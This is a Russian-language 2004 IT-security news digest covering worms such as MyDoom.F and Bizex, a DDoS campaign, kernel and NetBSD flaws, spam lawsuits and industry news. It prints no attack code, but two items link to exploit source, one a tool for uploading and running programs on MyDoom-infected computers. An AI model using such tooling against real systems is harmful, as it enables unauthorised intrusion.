В конце прошлой недели сразу несколько антивирусных компаний сообщили об обнаружении нового варианта червя MyDoom. Вредоносная программа MyDoom.F пока не получила широкого распространения, однако эксперты не исключают возможности начала новой эпидемии, cообщает "Компьюлента". Троян MyDoom.F, также как и его предшественники, распространяется по электронной почте в виде файлов-вложений. Тема письма, текст и название вложения выбираются произвольным образом из заложенного в код вируса списка. После неосторожного запуска присланного файла червь копирует себя в системную директорию Windows и регистрируется в ключе автозапуска реестра операционной системы. Кроме того, MyDoom.F пытается закрыть ряд запущенных процессов (в том числе и антивирусы), уничтожить файлы с расширениями .bmp, .avi, .jpg, .sav, .xls, .doc и .mdb и разослать свои копии по найденным на ПК адресам электронной почты. Наконец, если системная дата лежит в пределах между 17 и 22 числом месяца, червь организует DoS-атаку на сайты корпорации Microsoft и Американской ассоциации звукозаписывающих компаний (RIAA).
Подробности - http://vil.nai.com/vil/content/v_101038.htm

24/02/2004 11:03 Появление нового трояна - Worm.Win32.Bizex
"Лаборатория Касперского" сообщает об обнаружении нового сетевого червя Worm.Win32.Bizex, распространяющегося через ICQ, используя уязвимости самой ICQ, а также MS Internet Explorer. Пользователю ICQ приходит сообщение с приглашением посетить страницу на сайте "jokeworld" и дополнением ":)) LOL". В процессе демонстрации находящегося по этому адресу мультфильма из популярного сериала Joecartoon на компьютер пользователя через уязвимость в ICQ проникает вирус, изменяющий конфигурацию ICQ таким образом, чтобы разослать вышеприведенное сообщение всем контактам из контакт-листа программы. "Лаборатория Касперского" рекомендует в случае получения ссылки на веб-сайт "jokeworld" немедленно удалить данное сообщение и ни в коем случае не посещать указанный сайт.
Источник - http://www.kaspersky.ru

23/02/2004 14:18 Статья "TCP/IP КРУПНЫМ ПЛАНОМ".
На сайте ЗАО "Энергетика и связь строительства (г.Тольятти) обнаружена довольно полезная и объёмная статья под названием "TCP/IP крупным планом". Протоколы, составляющие основу Интернет, описаны довольно подробно и на высоком уровне. Думается, статья будет полезна многим.
Статья - http://www.zeiss.net.ru/docs/technol/tcpip/tcp00.htm

23/02/2004 13:43 Microsoft угрожает судом.
Корпорация Microsoft в среду разослала письменные уведомления пользователям, загрузившим украденный на прошлой неделе код операционных систем Windows NT 4 и Windows 2000. В предупреждениях, в частности, говорится, что софтверный гигант вправе инициировать судебное разбирательство против любого, кто попытается найти, загрузить, отправить по почте, опубликовать в интернете или применить в собственных целях исходники операционных систем. Более того, в некоторые пиринговые сети были внедрены специальные программные агенты, высвечивающие предупреждения всякий раз, как только пользователи пытаются ввести запрос, связанный с кодом Windows.
Источник - http://www.sysadmins.ru

23/02/2004 13:20 Microsoft сворачивает проект Jupiter.
Представители Microsoft сообщили о заморозке работы над проектом Jupiter, в рамках которого осуществлялась интеграция программных серверов Microsoft BizTalk Server, Content Management Server и Commerce Server в единый пакет. "Клиенты сообщили нам о своем нежелании приобретать интегрированный продукт сейчас, хотя не исключают такой возможности в будущем", - пояснил представитель Microsoft. Аналитики считают, что такая интеграция могла бы создать трудности с лицензированием, не добавив при этом компонентам пакета функциональности. Незадолго до объявления о прекращении работы над проектом был выпущен BizTalk Server 2004, что было провозглашен Microsoft "первым этапом Jupiter". На втором этапе сервер электронной коммерции планировалось интегрировать с двумя остальными. Целью всего проекта было обеспечение возможности конкуренции с пакетами, подобными IBM WebSphere и BEA WebLogic.
Источник - http://www.osp.ru

23/02/2004 13:07 MandrakeSoft лишится своей торговой марки на Linux.
Французский суд принял решение против Linux-поставщика MandrakeSoft в судебном разбирательстве с американскими компаниями Hearst Holdings и King Features Syndicate. Данное решение может привести к тому, что парижская компания будет вынуждена отдать торговую марку, доменные имена и заплатить 70.000 евро за ущерб, причиненный владельцам авторских прав на персонажа комиксов, именуемого Mandrake the Magician. Великому чародею в этом году исполнится 70 лет.
MandrakeSoft будет позволено использовать существующее название и Web-адреса на время апелляции принятого 13 февраля в Париже судебного постановления. Компания утешает всех, сообщая, что данный процесс может затянуться еще года на три.
«Апеллируя к решению, мы можем сдерживать предписанные запреты и продолжать использовать нашу торговую марку и доменные имена», — заверил Francois Bancilhon, глава MandrakeSoft. Раньше MandrakeSoft на своем логотипе изображала Linux-пингвина, одетого в чародейское одеяние, но затем компания отказалась от подобного изображения на своих продуктах.
Источник - http://www.nixp.ru

23/02/2004 12:13 Washington Post: международные киберпираты зарегистрированы в Палестине.
Интернет-компания Earth Station V, предлагающая бесплатный обмен аудио- и видеофайлами, утверждает, что она разработала технологию, позволяющую нарушителям законов об авторских правах, оставаться неизвестными. Ее представители объявили "войну" двум ведущим организациям США, Ассоциации американской индустрии звукозаписи (RIAA) и Американской ассоциации кинопроизводителей (MPAA), которые борются с незаконным распространением музыки и кинофильмов в интернете. Компания зарегистрирована в городах Дженине и Рамалле на территории палестинской автономии, и действует под лозунгом "Сопротивление - бесполезно", имея в виду невозможность заставить людей отказаться от бесплатного доступа к продукции кино- и аудиоиндустрии. По данным газеты Washington Post, среди учредителей компании числится Стивен Майкл Коэн, имеющий неофициальный титул "короля сетевой порнографии". С 2001 года он объявлен в розыск властями США по обвинению в неуплате 65 миллионов долларов в качестве возмещения ущерба за незаконное использование доменного имени sex.com. Представитель Earth Station V Стив Тейлор подтверждает регистрацию компании в Палестине и объясняет это тем, что там не действуют международные законы о защите авторских прав. По словам Тейлора, у компании есть офисы в на Западном берегу и в секторе Газа, но они вынуждены скрывать их местонахождение из-за враждебного отношения палестинских боевиков, недовольных наличием порнографии на сайте компании. Всего на компанию работает 710 человек в разных странах, в том числе и в России.
Подробности - http://www.lenta.ru/internet/2004/02/23/rebels/

23/02/2004 11:26 Суд объявил незаконной компьютерную программу для копирования DVD.
Американский суд по иску Американской ассоциации кинопроизводителей (MPAA) объявил незаконной компьютерную программу компании 321 Studios, которая позволяет копировать DVD-диски, сообщает BBC News. Суд приказал свернуть продажи программы в течение недели. 321 Studios, разработчик популярной программы DVD X Copy, предназначенной для изготовления дубликатов DVD-дисков на записывающих компьютерных DVD-приводах, заявила, что подаст апелляцию на решение суда. По мнению представителей компании, пользователи имеют право на свободное копирование в личных целях имеющейся у них легально приобретенной информации. Кинопроизводители же утверждают, что DVD X Copy является пиратским инструментом, позволяющим нелегально тиражировать продукцию, охраняемую авторскими правами.
Подробности - http://news.bbc.co.uk/2/hi/technology/3512825.stm

22/02/2004 17:35 Компьютерная преступность в Республике Беларусь объявлена вне закона.
Президент Белоруссии Александр Лукашенко утвердил Государственную программу по усилению борьбы с преступностью на 2004-2005 г.г. Как сообщают в пресс-службе белорусского Президента, программа выработана на основе анализа криминогенной ситуации в Белоруссии, результатов научных исследований, практики борьбы с преступностью, опыта реализации мероприятий, предусмотренных аналогичной программой на 2001-2003 годы. Новая белорусская программа предполагает продолжение сотрудничества страны с Советом Европы по присоединению Белоруссии к основным международным договорам в уголовно-правовой сфере. Органам государственного управления Белоруссии поручено также заключить двусторонние соглашения с рядом стран о развитии сотрудничества в борьбе с организованной преступностью. В соответствии с программой в Белоруссии будут проведены оперативно-профилактические мероприятия и специальные операции по предупреждению и пресечению актов терроризма и проявлений экстремизма, незаконного оборота наркотиков, преступлений в сфере компьютерных технологий, деятельности организованных преступных групп в сфере незаконной миграции, случаев контрабанды культурных ценностей. Совет министров Белоруссии должен ежегодно информировать Александра Лукашенко о ходе реализации программы.
Источник - http://www.crime-research.ru

22/02/2004 17:21 Linux-сервера атакуют все чаще.
Линуксоиды, как пишет ZDNet Australia, допрыгались. Твердя направо и налево о том, что Linux-де лучше защищен от хакерских атак, нежели программное обеспечение производства компании Microsoft, поклонники Linux, кажется, накликали на себя беду, разбудив спящую собаку. Судя по всему, хакеры приняли вызов. По крайней мере, в январе 2004 года основная доля сетевых атак пришлась именно на Linux-сервера. По данным консалтинговой компании mi2g, в январе 2004 года Linux-сервера были атакованы 13654 раз (80% всех предпринятых атак), в то время как машины, работающие под управлением Windows, ломали всего 2005 раз. Компания обращает особое внимание на тот факт, что в данном случае речь идет только об успешных атаках, а не только о наивных попытках взлома, предпринятых дилетантами. Таким образом, в прошлом месяце Linux-сервера взламывались каждые три минуты. И это данные, касающиеся только серверов, принадлежащих фирмам из Соединенного королевства! А сколько их было убито по всему миру? Ситуация с серверами, установленными правительственными организациями выглядит немного получше, но тоже не в пользу Linux-систем. В январе на долю Linux пришелся 51% всех удачных взломов. Тем не менее, успокаивают специалисты из mi2g, виной такого провального выступления Linux на серверном рынке стал, скорее всего, пресловутый человеческий фактор. А точнее – недостаточный уровень подготовки администраторов и пользователей в смысле управления и настройки Linux-сервера (чего и следовало ожидать - прим. ньюсмейкера).
Источник - http://news.zdnet.co.uk/

22/02/2004 16:42 Китай предъявил спамерам ультиматум.
Киберполицейские Поднебесной опубликовали черный список 656 спам-серверов по всему миру и установили дедлайн, по истечению которого рассылка нежелательных коммерческих сообщений должна прекратится. Интернет Сообщество Китая будет пристально наблюдать за деятельностью отмеченных веб-узлов. Если 20 марта распространение спама не закончится, все они будут заблокированы, - сообщает информационное агентство Xinhua. «Смертельный список», составленный по результатам длительного мониторинга, содержит 62 китайских серверов, 65 тайванских, 6 в Гонконге и 523 из других стран света. Как известно, в сентябре прошлого года на территории страны было заблокировано 127 серверов. Тогда это привело к тому, что масса электронных писем с санкционированных серверов так и не дошла до реципиентов.
Источник - http://www.runet.ru

22/02/2004 16:17 Все входящие на мобильные должны быть бесплатными.
Минсвязи РФ и "Ростелеком" считают целесообразным, чтобы все входящие звонки были бесплатными для абонентов сотовой связи. Об этом заявили на проходящей в Москве конференции "Инвестиции и мобильная связь России" первый заместитель министра связи РФ Борис Антонюк и заместитель генерального директора - коммерческий директор "Ростелекома" Гульнара Хасьянова. По мнению Б.Антонюка целесообразно установит такой порядок взаиморасчетов между операторами всех видов телефонной связи, при котором плата за терминацию звонка, то есть за его доставку к телефону адресата, включается в цену исходящего вызова. Другими словами, абонент, совершающий звонок, платит полную цену этого звонка, включая цену вызова, передачи звонка по магистральной сети и терминации звонка, своему оператору. А абонент, принимающий звонок, в таком случае ничего за это не платит. В настоящее время, в большинстве случаев, когда звонок передается из сети одного оператора в сеть другого, за звонок платят оба абонента. Предлагаемый порядок расчетов позволит сделать все входящие звонки на сотовые телефоны бесплатными, независимо от того, из какой сети сделан вызов. Г.Хасьянова считает, что в настоящее время создались условия, позволяющие перейти к такой системе расчетов.
Источник - http://www.mobile.ru

22/02/2004 16:01 Размышления о будущем XFree86.
На сайте computerra.ru опубликована довольно интересная статья Евгения Золотова, посвящённая событию, недавно всколыхнушему Linux (и не только) сообщество. Разработчики XFree внесли изменения в лицензию, под которой выпускается их продукт. XFree86 Project License версии 1.0, использовавшаяся для XFree86 версии 4.3 и более ранних, заменена на доработанную лицензию за номером 1.1. Старая лицензия XFree могла быть описана простой фразой: делайте с кодом что угодно, только не говорите, что его написали вы. Суть добавлений в новой лицензии сводится к необходимости обязательного упоминания проекта The XFree86 Project в списке разработчиков того продукта, в котором сервер XFree86 будет использован, и различных сопроводительных документах. Сразу после этого разработчики Linux-дистрибутива Mandrake, а за ними и группы, отвечающие за множество других дистрибутивов (и не только Linux), сообщили о своём отказе от включения в последние версии своих продуктов ожидающейся в ближайшее время XFree86 4.4. Red Hat, Debian, Gentoo, OpenBSD - вот неполный список участников сформировавшегося в считанные дни движения сопротивления.
Подробности - http://www.computerra.ru/think/sentinel/32255/

22/02/2004 15:35 Статья "Защита, использующая хасп-ключ".
На сайте Дмитрия Леонова bugtraq.ru в рамках конкурса на лучшую статью "BugTraq 3/4" опубликована статья господина под ником Chingachguk под названием "Защита, использующая хасп-ключи". В ней автор рассматривает защиту программы, использующей HASP-ключи. В статье представлен поверхностный анализ защиты такого типа в рамках изучения win32-программ, обладающих защитой в нулевом кольце и hasp. Для анализа механизма защиты использовались Soft-Ice (под '98), hiew.
Статья - http://bugtraq.ru/library/programming/haspprotection.html

22/02/2004 14:49 Британский комитет ICSTIS требует оштрафовать американских спамеров.
Решением британских властей американская компания BW Telecom обязана выплатить штраф в размере 75 тысяч фунтов стерлингов (4,04 миллиона рублей) за рассылку порнографического спама, автоматически переключающего пользователей на дорогостоящую телефонную линию, сообщает сайт theWIR. Британский независимый комитет по контролю стандартов телефонных и информационных служб (ICSTIS) получил около 900 жалоб от обманутых спамерами пользователей. Рассылка содержали порнографические изображения, при активации которых пользователь автоматически подключался к линии стоимостью 1,5 фунта в минуту. Авторы спамовых писем из компании BW Telecom не предупреждали пользователей о стоимости услуг, в результате чего один из них получил телефонный счет на сумму 200 фунтов (10790 рублей). Для отключения от дорогостоящей линии пользователям приходилось полностью прерывать соединение с интернетом. Подобные случаи были зарегистрированы в российской практике. Так, в Казани еще в конце 2002 года жертвами мошенников стали несколько физических и юридических лиц. Одному из жителей Татарстана неосмотрительно подключившемуся к интернету через спутниковую телефонную сеть EMSAT пришел телефонный счет на сумму в 134 тысячи рублей.
Источник - http://www.viruslist.ru

21/02/2004 17:31 РосНИИРОС: изменения в «Регламенте и тарифах на услуги по регистрации доменов второго уровня в зоне .RU».
РосНИИРОС сообщил, что 20-го февраля 2004-го года вступят в силу изменения в «Регламенте и тарифах на услуги по регистрации доменов второго уровня в зоне .RU» (Приложение N 1 к Договору «О регистрации и технической поддержке доменов второго уровня в зоне .RU»). Большая часть изменений связана с институтом независимых регистраторов и касается новой системы распределенной регистрации доменных имен в зоне .RU. Внесение изменений в «Регламент…» вызвано необходимостью до окончания опытной эксплуатации системы распределенной регистрации доменных имен в домене .RU отработать технологию прекращения деятельности аккредитованного регистратора (например, 1-го января 2005-го года будет прекращено действие всех договоров «О регистрации и технической поддержке доменов второго уровня в зоне .RU», заключенных РосНИИРОС с организациями и физическими лицами). Также 20-го февраля 2004-го года вступают в силу положения «Регламента…», устанавливающие новый срок, в который владелец домена должен ответить на запрос администратора зоны .RU с требованием подтвердить предоставленные владельцем домена сведения, содержащиеся в базе данных РосНИИРОС. Этот срок сокращен с одного месяца до 14-ти календарных дней. При отсутствии ответа на запрос администратор зоны .RU имеет право прекратить делегирование домена, а по истечении 20-ти календарных дней с момента прекращения делегирования домена регистрация доменного имени может быть аннулирована.
Источник - http://www.provider.net.ru

21/02/2004 17:19 DDoS атака на peterhost и masterhost - это только начало.
В результате отражения DDOS атаки, возможно удалось установить брешь в Remote Administrator. Как ни странно, этот факт меньше всего касается администраторов ОС линейки Windows. Начавшаяся 21-го января 2004 года DDOS (Distributed Denial of Service Attack) атака, затронувшая некоторые интернет-ресурсы в России, включая http://www.peterhost.ru и http://masterhost.ru, продолжается по настоящий момент и растёт по мощности со временем. Данная атака в начале представляла собой флуд пакетами tcp-syn и udp на порты 21,22,53,80,110 и характерными пакетами IP с установленным кодом протокола 255 (зарезервирован). Атака периодически перерастает в tcp-ack флуд на порт 80. По результатам исследований специалисты установили, что "замусоривание" создают небольшие по размеру исполняемые программы на "заражённых" компьютерах. Это ".exe" файлы, расположенные в корневом каталоге диска C каждого компьютера. Они имеют различный размер - от 3072 до 5120 байтов. Возможные имена программ: 666.exe, rich.exe, ric1.exe, fich.exe, tcpf.exe, udpf.exe, tzpf.exe, tzpy.exe. Все эти программы уже распознаются антивирусом DrWeb (http://drweb.ru)как вредоносные. Скорее всего, это ненастоящая "инфекция". Поражённые компьютеры имеют различные установленные версии Microsoft Windows, такие как Windows'98, Windows'2000, Windows'XP. Некоторые из этих компьютеров защищены с помощью firewall. На компьютерах установлено различное программное обеспечение, но все они сходятся в одном - на них установлена программа Remote Administrator 2.x (http://www.famatech.com), открытая для доступа извне. Предположение, что пароли доступа к управлению этой программой были простыми и легко подбираются, маловероятно. В результате переписки одного из специалистов и владельца одной из машин, совершавшей атаку, выяснилось, что пароль был достаточно надёжен.
Подробнее - http://www.opennet.ru/opennews/art.shtml?num=3424

21/02/2004 16:13 Патч уязвимости в ядре Linux.
Pavel Palat из Чехии опубликовал хотфикс для ядра Linux, устранящий уязвимость в системном вызове do_mremap(). Как пишет сам автор, его хотфикс не переписывает код системной функции, он использует загружаемый модуль (LKM) для перезаписи указателя системного вызова. Помимо собственно хотфикса в архиве также исходник эксплоита, при помощи которого можно проверить наличие (или отсутствие) уязвимости в ядре.
Патч - http://wizard.ath.cx/fixmremap2.tar.gz

21/02/2004 16:08 Статья "Настройка NetBSD".
На сайте DreamCatcher опубликован перевод статьи "NetBSD Tuning" из собрания официальной документации. Статья включает следующие разделы: Утилиты визуального мониторинга; Утилиты мониторинга; Сетевые утилиты; Аккаунтинг; Профили ядра; Тюнинг системы; Тюнинг ядра.
Cтатья - http://www.dreamcatcher.ru/docs/netbsd_tun.html

21/02/2004 15:04 Выход ядра Linux 2.4.25.
После опубликования отчётов о существовании уязвимостей в ядрах Linux была выпущенна обновлённая версия ядра ветки 2.4 - 2.4.25. Изменения в ядре произошли довольно кардинальные: включена поддержка XFS журналируемой файловой системы и в связи с этим произошли изменения в general коде файловых систем; многочисленные изменения для архитектур PowerPC32/64, IA64 u IA32; обновлены драйверы USB; исправления в ACPI; исправлена работа ядра с большой памятью; улучшен код NETFILTER.
Подробности - http://kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.25

21/02/2004 14:41 Разработан новый способ борьбы со спамом.
Улучшить ситуацию в борьбе со спамом можно путем использования новой методики отсеивания рекламных писем, разработанной американскими исследователями. По крайней мере, именно так считают авторы технологии, сотрудники Калифорнийского университета в Лос-Анджелесе, сообщает журнал Nature. Дело в том, что по статистике большая часть "полезных" сообщений приходят с ограниченного количества адресов. Причем владельцы таких почтовых аккаунтов, как правило, входят в одну и ту же социальную группу, в которой все друг друга знают. Иными словами, если, например, Саша получает сообщения от Пети и Коли, то вероятность того, что Петя и Коля знают адреса друг друга и могут обменяться письмами, гораздо выше, чем если бы у них не было общего знакомого. Послание же, отправленное спамерами, получают десятки тысяч людей, не имеющих между собой ничего общего, что и служит основанием для отбраковки. Таким образом, новая система очень сильно напоминает так называемые белые списки, куда заносятся доверительные адреса. Основное же различие заключается в том, что белые списки нужно настраивать вручную, а предложенная американцами методика с этой целью использует специальную программу, отслеживающую содержимое полей "от кого", "кому" и "копия" каждого электронного сообщения. На основании собранной статистики утилита и делает вывод относительно характера того или иного письма. При этом тестирование технологии показало, что существуют определенные рамки, при выходе за которые, компьютер не может точно идентифицировать тип послания. Эффективность фильтрации, в результате, составляет порядка 50 процентов.
Источник - http://www.compulenta.ru

21/02/2004 14:19 Microsoft приступает к тестированию Virtual Server.
На этой неделе Microsoft начала программу бета-тестирования программного обеспечения Virtual Server, которое позволяет исполнять несколько операционных систем на одном сервере. Год назад Microsoft приобрела это ПО (оно находилось в стадии разработки) у Connectix — вместе с Virtual PC для Мас и Windows, отредактированная версия которого вышла в ноябре. Сначала Microsoft выражала надежду, что Virtual Server выйдет в 2003 году, но затем выпуск был перенесен на этот год. Теперь компания обещает выпустить окончательную версию программы — она будет называться Virtual Server 2004 — в середине года. Продукт будет продаваться через обычные каналы продаж Microsoft, такие как производители и продавцы ПК, а также напрямую и по оптовым лицензиям. Цены на него еще не объявлены. Virtual Server не предназначен для управления многими задачами, хотя подобное ПО виртуальной машины можно использовать и для этого, пояснил генеральный менеджер отделения Microsoft Windows Server Эрик Берг. Microsoft рассматривает Virtual Server как способ заинтересовать некоторых заказчиков в консолидации их серверов под Windows 2000, Windows NT 4 и другими старыми версиями Windows.
Подробности - http://zdnet.com.com/2100-1104_2-5161193.html

21/02/2004 13:55 Earthlink и America Online подали иски против спамерских групп.
Американский интернет-провайдер Earthlink Inc. 18 февраля обратился в суд Атланты с иском против группы спамеров. Отягчающим обстоятельством для ответчиков является то, что для рассылки миллионов писем они использовали учетные записи, оплаченные украденными кредитными картами, сообщает Associated Press. Earthlink Inc. называет спамеров «Алабамской бандой», поскольку они часто пользовались телефонными линиями города Бирмингем, расположенного в этом штате. Однако кроме жителей Алабамы в состав преступной группы входили 16 физических и юридических лиц из штатов Флорида, Калифорния, Теннеси, Мичиган и Невада. Первый иск против спамеров Earthlink Inc. был подан еще в августе прошлого года. Тогда авторы иска в качестве ответчика называли группу John Does и заявляли о намерении взыскать с нее 5 миллионов долларов. Между тем, еще один иск против спамеров на основании принятого недавно федерального закона на прошлой неделе подала компания America Online (AOL). Ответчиком выступает IT-компания Connor Miller Software из Флориды, сотрудников которой подозревают в содействии таиландским спамерам. По словам представителей America Online в их адрес поступило 1,5 миллиона жалоб от получателей спама. В AOL полагают, что усилиями Connor Miller Software для таиландских спамеров было открыто несколько серверов и разработано специальное программное обеспечение, позволяющее обходить почтовые фильтры. В свою очередь представительница ответчика Хейди Миллер (Heidi Miller) заявляет, что в создании программы для рассылки писем по адресам из законным образом приобретенного списка нет ничего противоправного.
Источник - http://www.viruslist.ru

21/02/2004 13:03 Киберпреступность в России растет, а милиция сокращается.
По данным МВД России, количество преступлений в сфере высоких технологий в 2003 г. удвоилось и превысило 11 тыс. зарегистрированных случаев. Высокие темпы роста правонарушений в сфере высоких технологий или с использованием этих технологий говорят о том, что преступники быстро осваивают новые средства для совершения злонамеренных действий. Среди наиболее распространенных нарушений представители МВД особо выделяют: несанкционированный доступ к информационным системам; распространение нелицензионного ПО; атаки на финансовые системы. Российские хакеры предпочитают именно последний вид нарушений. Объектами атаки в большинстве случае становятся различные финансовые структуры: банки, инвестиционные компании и т.д. В подтверждение того, что отечественные хакеры не дремлют, появился вирус Novarg/MyDoom, в разработке которого практически все специалисты обвиняют именно российских вирусописателей. Эпидемия была спланирована таким образом, чтобы «вирусный удар» затронул как можно большее количество компьютеров во всем мире. Однако сложная криминогенная ситуция в том числе и рост киберпереступности сопровождается с серьезными стуктурными изменениями в МВД России. В Государственной Думе рассматривается проект Закона «О правоохранительной деятельности в Российской Федерации». В случае его принятия Министерство внутренних дел прекратит своё существование и будет расформировано на 4 независимых федеральных органа исполнительной власти:
1. Федеральная служба криминальной милиции. В неё войдут ныне действующие специализированные органы дознания: уголовный розыск; по борьбе с экономическими и налоговыми преступлениями; по борьбе с незаконным оборотом наркотиков; по борьбе с организованной преступной деятельностью и коррупцией; иные оперативные и оперативно-технические подразделения.
2. Федеральная служба расследования. Это Следственный комитет при МВД России и его подразделения на местах (следственные управления, отделы, отделения).
3. Национальная гвардия – ныне действующие внутренние войска МВД России. Их предполагается задействовать для участия в локальных конфликтах (войнах) на территории России и поддержания конституционного порядка.
4. Муниципальная милиция. Это милиция общественной безопасности, финансируемая за счёт средств местного бюджета территориальных административных формирований субъектов РФ (местных администраций Республик, краёв, областей).
Источник - http://www.crime-research.ru/

21/02/2004 12:48 Выход Dr.Web 4.31а.
ЗАО "ДиалогHаука" сообщает о выходе исправленной версии - 4.31а - популярной антивирусной программы Dr.Web для Windows 95/98/Me/NT/2000/XP, DOS/386, OS/2, Novell NetWare. Главной особенностью этого патча является добавление возможности в GUI-сканер проверять не только файлы автозагрузки Windows, но также и все файлы, связанные с процессами в оперативной памяти, запущенными на момент сканирования. При этом Dr.Web проверяет возможное наличие в памяти вирусных процессов, которые еще не нашли отражения в файлах автозагрузки и поэтому недоступны при сканировании этих файлов. При нахождении зараженных процессов Dr.Web немедленно прекращает их, если это предусмотрено соответствующими настройками сканера. Такая возможность дает пользователям наших антивирусных продуктов для Windows еще большую защиту от всевозможных вредоносных программ, которые могут заразить компьютер в самом начале эпидемии, еще до поступления соответствующего вирусного обновления из антивирусной лаборатории. После получения обновления пользователю достаточно всего лишь запустить антивирусный сканер Dr.Web, который сделает экспресс-проверку компьютера в считанные секунды и обезвредит возможно находящиеся в памяти вирусы.
Подробности - http://www.drweb.ru

20/02/2004 18:04 Собственно, эксплоит Mydoom.
Уважаемый druid прислал нам сообщение о том, что им создан "линукс порт утилиты от k-otik.org для закачки и выполнения программ на компьютерах, заражённых mydoom". Напомним, что на сайте k-otik.org был создан эксплоит господином Кристофером Дивайном для использвония компьютеров, заражённых mydoom.
Исходник - http://jeremy-x11.narod.ru/doom_upload.c

20/02/2004 14:44 Потянет ли ваш ПК Longhorn?
Microsoft сообщила, что на майской конференции разработчиков она изложит требования к оборудованию для работы с Longhorn — следующей версией Windows. В письме Microsoft говорится, что на конференции WinHEC (Windows Hardware Engineering Conference), которая будет проходить с 4 по 7 мая в Сиэтле, компания представит спецификации компьютеров, удовлетворяющих требованиям для работы с операционной системой Longhorn. В приглашении на конференцию Microsoft сообщает, что разработчики аппаратуры и драйверов смогут «бросить первый пристальный взгляд» на Longhorn. Кроме обнародования требований к системе, компания обещает объяснить, как писать драйверы для подключения к Longhorn аппаратуры, а также рассказать о направлениях дальнейшего развития мобильных вычислений и систем Tablet PC, Media Center Edition, 64-битной Windows и встроенных версий Windows. Компания провозглашает Longhorn самым радикальным усовершенствованием с момента выхода Windows 95. В операционной системе будут три важные новые технологии — механизм обработки графики и представления данных Avalon, архитектура связи Indigo и файловая система WinFS.
Подробности - http://zdnet.com.com/2100-1104_2-5161274.html

20/02/2004 14:39 Microsoft выпустит компакт-диски с патчами для Windows.
Компания Microsoft объявила о начале выпуска обновлений для своих операционных систем на компакт-дисках. На такой шаг компания пошла в ответ на критику со стороны ряда экспертов по безопасности, которые утверждают, что пользователям, подключающимся к интернету с помощью аналоговых модемов, скачивать многомегабайтные патчи и сервис-паки затруднительно. В результате, их компьютеры остаются беззащитными перед новыми вирусами и червями. Выпущенный Microsoft компакт-диск будет распространяться бесплатно. Он включает все критические патчи и обновления, выпущенные софтверным гигантом до октября прошлого года. Компакт-диски выпущены для операционных систем Windows 98, Me, 2000 и XP. Пока обновления на CD не поставляются для локализованных версий Windows, за исключением китайской, японской и корейской. Впрочем, пользователи в других странах без компактов с патчами не останутся: обновления на CD для них будут выпущены после 23 февраля.
Подробности - http://www.microsoft.com/security/protect/cd/order.asp

20/02/2004 14:14 Список непатченных уязвимостей Windows.
Господа из eEye Digital Security держат на одной из страниц своего сайта перечень наличия уязвимостей в различных версиях Windows, патчи для которых пока не выпущены. Список на настоящий момент насчитывает 7 уязвимостей в Windows и 1 в BlackIce (разработчик - ISS). Опасность дыр представлена следующими цифрами: High - 3, Medium - 3, Low - 1. Число потенциально уязвимых машин также впечатляет и идёт на миллионы (ии даже сотни миллионов). Примечательно, что самая старая уязвимость, отчёт о которой направлен Microsoft, была обнаружена аж 103 назад. А Microsoft молчит...
Подробности - http://www.eeye.com/html/Research/Upcoming/index.html

20/02/2004 13:11 Уязвимости в NetBSD.
Группа разработчиков ОС NetBSD выпустила 4 бюллетеня по безопасности: 2004-001/002/003/004, в которых описываются уязвимости в компонентах ОС: демоне racoon IKE, механизме обработки пакетов протокола IPv6 c некорректным полем MTU, пакете OpenSSL (из-за уязвимости в пресловутом ASN.1), в системном вызове ядра shmat(2). Для всех версий NetBSD - 1.5.*, 1.6.* выпущены обновления.
Подробности - http://www.netbsd.org/Changes/#sa2004-040218

20/02/2004 13:01 Microsoft выпустила неофициальный патч для Win98?
По сообщению Joshua Levitsky, Microsoft выпущен неофициальный патч для Windows98, устраняющий уязвимость, описанную в бюллетене по безопасности MS04-007 (ASN.1). Однако, при описании уязвимости никакой ссылки на патч нет, равно как и нет этого патча на сайте Windows Update. Патч рассылается при прямом обращении в службу тех. поддержки региональных представительств. Разуммется, при этом надо быыть клентом (официальным) этой самой службы.
Источник - http://www.securityfocus.com

20/02/2004 12:05 Электронный журнал "Спамтест" No. 37.
На сайте "Лаборатории Касперского" выложен очередной, 37-й, номер электронного журнала "Спамтест". В номере: Новости, Спам-фильтр "Барьер" – пример интеграции Kaspersky Anti-Spam, Ответы на вопросы читателей.
Подробности - http://www.kaspersky.ru/news.html?id=145787429

20/02/2004 11:32 Из израильского банка похитили клиентскую базу.
Из центрального компьютера банка «Леуми» похищен файл с секретной информацией о клиентских счетах. Взлом произведен две недели назад, однако информация о нем была обнародована лишь 17 февраля, сообщает агентство Cursor. Несмотря на серьезность инцидента, информация о нем не была доведена до полиции, и расследование велось силами частного сыскного агентства. Преступники, проникшие две недели назад в компьютерный центр банка «Леуми» в городе Лод, сумели подключиться к одному из терминалов и скачать на свой компьютер файл с данными о тысячах задолжавших банку бизнес-клиентах, профиле их деятельности, величине долга и гарантийных обязательствах, предоставленных под ссуды. После копирования данных оригинальный файл был уничтожен. По мнению экспертов, данная информация может быть использована с целью шантажа и вымогательства как руководства самого банка, так и его клиентов. Возможно также, что взлом совершил один из дебиторов банка, пытавшийся таким образом ликвидировать сведения о своей задолженности. Позже утраченные данные были восстановлены, а к расследованию происшествия подключилась следственная бригада полиции.
Источник - http://www.viruslist.ru

20/02/2004 11:06 Cisco выпустит дешевую видеосистему для интернет-телефонии.
Компания Cisco Systems объявила о выпуске программного обеспечения для IP-телефонии, которое позволит получать видеоизображение телевизионного качества на экране монитора в реальном времени. Как сообщает агентство Reuters, стоимость видеосистемы, включающей программный пакет VT Advantage 1.0 и вебкамеру, не будет превышать 200 долларов. Пользователям необходимо установить веб-камеру и программу, чтобы, совершая обычный телефонный звонок, видеть собеседника на экране. При этом, по словам представителя компании Мартина Де Бира (Marthin De Beer), не нужно ничего нажимать дополнительно, так как подключение происходит в автоматическом режиме. Изображение передается на дисплей с частотой 30 кадров в секунду, что значительно выше качества картинки на большинстве других видеофонов. К тому же, новая программа автоматически распознает телефонное соединение, поэтому телефон не надо подключать напрямую к компьютеру.
Подробности - http://story.news.yahoo.com/news?tmpl=story...

20/02/2004 10:35 Cерьёзная ошибка в FAT32?
